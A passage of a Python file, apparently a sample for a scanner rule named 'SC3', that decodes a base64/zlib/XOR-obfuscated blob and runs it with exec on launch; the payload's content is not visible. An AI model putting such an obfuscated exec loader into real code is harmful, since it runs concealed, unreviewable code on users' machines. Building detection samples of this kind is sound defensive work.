RXrUG/n/CY0CpTX94VrU/iW8c3Hji//iUu/4cvwaOAlTY8fxve7mBbAWNC0ns2PG488fDpj/C46GuysvSncGvJCRP+7DdFbFtnineCbcdu8wQjKext6d2m9ly8r/lEGyjx70ZZ/Dq86+cUS7//i2LlOdgZP/toEutHNxim+S936Jjl"
_K = bytes.fromhex("03a5637ac5b9e648ed34e015")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
